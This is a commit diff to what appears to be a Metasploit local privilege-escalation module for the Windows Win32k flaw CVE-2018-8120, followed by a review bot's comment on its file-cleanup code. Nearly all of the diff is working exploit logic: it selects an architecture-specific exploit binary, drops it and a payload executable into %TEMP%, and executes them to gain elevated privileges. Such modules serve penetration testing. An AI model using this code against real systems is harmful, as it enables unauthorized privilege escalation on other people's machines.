addressed suggestions
parent
96eeaf7da3
commit
26631bcfbd
Binary file not shown.
|
@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
include Msf::Post::File
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Post::Windows::Priv
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
|
||||
def initialize(info={})
|
||||
|
@ -61,45 +62,33 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
fail_with(Failure::None, 'Session is already elevated')
|
||||
end
|
||||
|
||||
if sysinfo['OS'] =~ /XP/
|
||||
if sysinfo['OS'] =~ /XP|NT/i
|
||||
fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
|
||||
end
|
||||
end
|
||||
|
||||
def write_exe_to_target(rexe, rexename)
|
||||
def write_file_to_target(fname, data)
|
||||
begin
|
||||
vprint_warning("Writing file to %TEMP%")
|
||||
print_good("Exploiting SetImeInfoEx Win32k NULL Pointer Dereference")
|
||||
temprexe = "#{session.fs.file.expand_path("%TEMP%")}\\#{rexename}"
|
||||
write_file_to_target(temprexe,rexe)
|
||||
tempdir = session.sys.config.getenv('TEMP')
|
||||
file_loc = "#{tempdir}\\#{fname}"
|
||||
vprint_warning("Attempting to write #{fname} to #{tempdir}")
|
||||
write_file(file_loc, data)
|
||||
rescue
|
||||
fail_with(Failure::Unknown, "Writing #{rexename} to disk was unsuccessful")
|
||||
fail_with(Failure::Unknown, "Writing #{fname} to disk was unsuccessful")
|
||||
end
|
||||
|
||||
vprint_good("File path: #{temprexe}")
|
||||
temprexe
|
||||
end
|
||||
|
||||
def write_file_to_target(temprexe, rexe)
|
||||
fd = session.fs.file.new(temprexe, "wb")
|
||||
fd.write(rexe)
|
||||
fd.close
|
||||
end
|
||||
|
||||
def create_payload_from_file(exec)
|
||||
vprint_status("Reading payload from file #{exec}")
|
||||
File.read(exec)
|
||||
vprint_good("#{fname} written")
|
||||
file_loc
|
||||
end
|
||||
|
||||
def check_arch
|
||||
sys_arch = sysinfo['Architecture']
|
||||
if sys_arch == ARCH_X86
|
||||
fail_with(Failure::BadConfig, "Invalid payload architecture") if payload_instance.arch.first == ARCH_X64
|
||||
return 'CVE-2018-8120x86.exe'
|
||||
|
||||
elsif sys_arch == ARCH_X64
|
||||
return 'CVE-2018-8120x86_64.exe' if session.arch == ARCH_X86
|
||||
|
||||
'CVE-2018-8120x64.exe'
|
||||
return 'CVE-2018-8120x64.exe'
|
||||
else
|
||||
fail_with(Failure::BadConfig, "Invalid architecture")
|
||||
end
|
||||
|
@ -109,23 +98,25 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
validate_target
|
||||
cve_fname = check_arch
|
||||
rexe = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', cve_fname)
|
||||
raw = create_payload_from_file(rexe)
|
||||
vprint_status("Reading payload from file #{rexe}")
|
||||
raw = File.read(rexe)
|
||||
|
||||
rexename = "#{Rex::Text.rand_text_alphanumeric(10)}.exe"
|
||||
vprint_status("EXE's name is: #{rexename}")
|
||||
exe = generate_payload_exe
|
||||
tempdir = session.sys.config.getenv('TEMP')
|
||||
tempexename = Rex::Text.rand_text_alpha(6..14)
|
||||
tempexename = "#{Rex::Text.rand_text_alpha(6..14)}.exe"
|
||||
|
||||
cmd = "#{tempdir}\\#{tempexename}.exe"
|
||||
vprint_status("Preparing payload at #{cmd}")
|
||||
write_file(cmd, exe)
|
||||
exe_payload = write_file_to_target(tempexename, exe)
|
||||
vprint_status("Payload uploaded to temp folder")
|
||||
script_on_target = write_exe_to_target(raw, rexename)
|
||||
command = "#{session.fs.file.expand_path("%TEMP%")}\\#{rexename}"
|
||||
vprint_status("Location of CVE-2018-8120.exe is: #{command}")
|
||||
cve_exe = write_file_to_target(rexename, raw)
|
||||
command = "\"#{cve_exe}\" \"#{exe_payload}\""
|
||||
vprint_status("Location of CVE-2018-8120.exe is: #{cve_exe}")
|
||||
begin
|
||||
register_file_for_cleanup(exe_payload)
|
||||
rescue AccessDeniedError
|
||||
print_error("Failed to delete file at #{cve_exe}")
|
||||
end
|
||||
|
||||
command << " #{cmd}"
|
||||
vprint_status("Executing command : #{command}")
|
||||
cmd_exec_get_pid(command)
|
||||
print_good('Exploit finished, wait for privileged payload execution to complete.')
|
||||
|
|
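Review bot: In the last hunk, the `begin`/`rescue AccessDeniedError` wrapped around `register_file_for_cleanup(exe_payload)` looks like dead code, and the exploit binary written to `cve_exe` is never registered, so it would be left behind in %TEMP% on the tested host. As far as I know `register_file_for_cleanup` only records the path for later deletion, so no deletion error can surface at this point. The error message also names `cve_exe` while the file being registered is `exe_payload`. I would replace the five lines with `register_file_for_cleanup(exe_payload, cve_exe)`. The enclosing method starts and ends outside the hunk.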